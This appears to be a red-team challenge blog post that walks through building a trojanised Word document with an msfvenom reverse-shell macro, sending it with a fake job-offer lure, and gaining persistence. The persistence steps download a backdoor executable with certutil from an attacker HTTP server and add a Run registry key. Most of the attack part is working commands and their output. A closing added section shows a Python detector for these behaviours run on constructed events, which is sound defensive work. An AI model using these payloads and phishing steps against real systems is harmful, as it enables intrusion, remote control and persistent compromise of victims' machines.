Thursday, September 30, 2021

RedTeam Challenge: Project S0c14l M3d1a series[II]

Hi everyone,


In this step we are going to make a malicious Office file that contains embedded malware, using an easy technique.

The attack context is a trojanised file that executes malware internally when the target user views or edits it.


GENERATE MALICIOUS PAYLOAD:

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.5 LPORT=9999 -f vba > payload2.vba

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload

[-] No arch selected, selecting arch: x86 from the payload

No encoder specified, outputting raw payload

Payload size: 324 bytes

Final size of vba file: 2626 bytes

The first step is to create a malicious payload with the msfvenom tool on the attacker machine; the output format should be a VBA file. This file type belongs to the Microsoft Office macro scripting language on Windows.


GENERATE DOCUMENT:

I use the "Macro pack" tool to inject the previous malicious payload into the trojan document:


The document file looks like a normal Microsoft Office Word document:


EDIT AND SEND DOCUMENT:

This is the moment to edit the document with the information you want, for example a job opportunity:



WAIT FOR RESPONSE:

And from the attacker side you only need to wait for a response on the port chosen in the malicious payload and enjoy:


PERSISTENCE:


1. From the attacker machine, generate a new payload:

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.5 LPORT=6969 -f exe > backdoor.exe

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload

[-] No arch selected, selecting arch: x86 from the payload

No encoder specified, outputting raw payload

Payload size: 324 bytes

Final size of exe file: 73802 bytes

The previous command generates a Windows executable named backdoor with the ".exe" extension.

2. From the attacker machine, launch an HTTP server with python3 to share the exe file with the target machine:

python3 -m http.server 8989

Serving HTTP on 0.0.0.0 port 8989 (http://0.0.0.0:8989/) ...

10.10.10.8 - - [30/Sep/2021 20:25:13] "GET /backdoor.exe HTTP/1.1" 200 -

10.10.10.8 - - [30/Sep/2021 20:25:13] "GET /backdoor.exe HTTP/1.1" 200 -

3. From the target machine, download the binary with certutil:

certutil -f -urlcache "http://10.10.10.5:8989/backdoor.exe" %APPDATA%\backdoor.exe

****  En línea  ****

CertUtil: -URLCache comando completado correctamente.


4. Modify the registry on the target machine for the persistence operation:

reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v persistence2 /t REG_SZ /d "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c \"start-process $env:APPDATA\backdoor.exe\""


And this is all: on every reboot of the target machine and login by the pwned user, the binary backdoor.exe is executed by itself and spawns a cmd shell back to the attacker machine.
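From the defensive side, as an added example that is not part of the original post, here is a small Python detector run over constructed sample telemetry for the three behaviours this walkthrough produces: an Office application spawning a shell (the macro stage), certutil pulling a file into a user-writable directory, and a Run key pointing at an executable under %APPDATA%. The event field names are assumptions loosely modelled on Sysmon process-creation and registry-set events, and the sample events are constructed, not real logs.

```python
"""Added detection example (not code from the original post). Scans constructed
process-creation and registry-set event dicts (fields loosely modelled on Sysmon
Event ID 1 and 13; an assumption) for the behaviours described in the post."""
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe"}
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run(Once)?(\\|$)", re.I)
USER_DIR_RE = re.compile(r"%APPDATA%|\$env:APPDATA|\\AppData\\|%TEMP%|\\Temp\\", re.I)
CERTUTIL_RE = re.compile(r"\bcertutil(\.exe)?\b.*-urlcache\b.*https?://", re.I)

def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.lower().rsplit("\\", 1)[-1]

def analyse(events):
    """Return (rule, detail) findings for a list of event dicts."""
    findings = []
    for ev in events:
        if ev["type"] == "process":
            parent, image = basename(ev.get("parent_image", "")), basename(ev["image"])
            cmd = ev.get("command_line", "")
            if parent in OFFICE_APPS and image in SHELLS:
                findings.append(("office_spawns_shell", f"{parent} -> {image}"))
            if CERTUTIL_RE.search(cmd) and USER_DIR_RE.search(cmd):
                findings.append(("certutil_download_to_user_dir", cmd))
        elif ev["type"] == "registry":
            if RUN_KEY_RE.search(ev["key"]) and USER_DIR_RE.search(ev["data"]):
                findings.append(("run_key_user_dir_persistence", f'{ev["key"]} = {ev["data"]}'))
    return findings

# Constructed sample telemetry mirroring the steps in this post; not real logs.
SAMPLE_EVENTS = [
    {"type": "process", "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\cmd.exe", "command_line": "cmd.exe"},
    {"type": "process", "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "command_line": r'certutil -f -urlcache "http://10.10.10.5:8989/backdoor.exe" %APPDATA%\backdoor.exe'},
    {"type": "registry", "key": r"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\persistence2",
     "data": r'powershell.exe -c "start-process $env:APPDATA\backdoor.exe"'},
    # Benign noise: a vendor updater registered under Run from Program Files.
    {"type": "registry", "key": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Updater",
     "data": r"C:\Program Files\Vendor\updater.exe /silent"},
]

if __name__ == "__main__":
    for rule, detail in analyse(SAMPLE_EVENTS):
        print(f"[{rule}] {detail}")
```

The Run-key rule deliberately keys on the target path rather than the value name, since the name ("persistence2" here) is attacker-chosen and carries no signal.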





And this is all for my first RedTeam challenge execution, "step 2". I hope that you'll share this challenge with me over the next days and we keep in touch.

With best regards, f0ns1


